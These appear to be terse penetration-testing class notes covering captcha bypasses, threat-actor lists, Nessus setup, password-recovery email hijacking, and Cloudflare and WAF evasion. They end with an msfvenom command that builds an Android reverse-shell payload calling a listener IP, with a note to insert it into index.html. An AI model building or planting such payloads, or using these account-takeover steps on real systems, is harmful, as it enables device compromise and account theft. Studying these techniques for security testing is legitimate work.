Tamper Data, Burp Suite
md5sum filename
Captcha: gets bypassed by not filling in the captcha; the captcha is stored in cookies; validate one captcha manually and reuse the same captcha every time in that session; the captcha turns out to be repeating.

== threats to a pharmaceutical company ==
- government/regulations
- criminal organizations
- competition
- Chinese APT
- unfair market
- blackmail
- insider threats

mobile front: XML
mobile API: Android, iOS, BlackBerry
logging: ELK stack, Splunk, QRadar, GFI, SolarWinds
databases: MS SQL, MySQL, Oracle, DB2 etc.
backend: PHP, ASP, Python etc.
middleware
front end

== threat actors in the case of a news media ==
politics
competition
black hats
availability, reputation, market share

===========================================================================
REMEDIATION
Insecure Direct Object Reference (IDOR)
172.16.60.85
172.16.60.88

Download Nessus from here. Choose the Ubuntu packages (or the Debian ones).
Open a Terminal and go to the download directory (cd).
Run sudo dpkg -i Nessus*.deb. Enter root password.
Start it: sudo /etc/init.d/nessusd start
Open a browser and go to https://localhost:8834/
===========================================================================
17.10.2018
Broken Authentication
Password recovery function: modify the email to which the OTP is sent to an email we have access to.
Opening the email asks to open a new mail: create a mail and replace it with the created email; intercept the request and insert the new email.
The function finds the mail, opens it and sends the confirmation, asking where to send the confirmation; modify this confirmation with the new mail and the confirmation goes to the new mail.
Every mail in Facebook's database is a new unique ID; this works only with new mails.

SQL injection
Sensitive data export
Bypass Cloudflare: try to find subdomains, find misconfigurations, look at the domain's history (how it was before it went behind Cloudflare); it is recommended to change the IP before going behind CF.
Bruteforce sub-domains; it is recommended to put all subdomains in.
Full path in the URL shows what can be hacked on that server.
XML and XXE attack
Bypass WAF: check for encoders, check for SQL injection (" for symbols, ')
Security Misconfiguration: NAT with all ports NAT'd to one port; SSH open; admin page open to external; device console unprotected
===========================================================================
19.10.2018
absent
===========================================================================
22.10.2018
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.65.141 LPORT=9999 R> king2.apk
insert it into index.html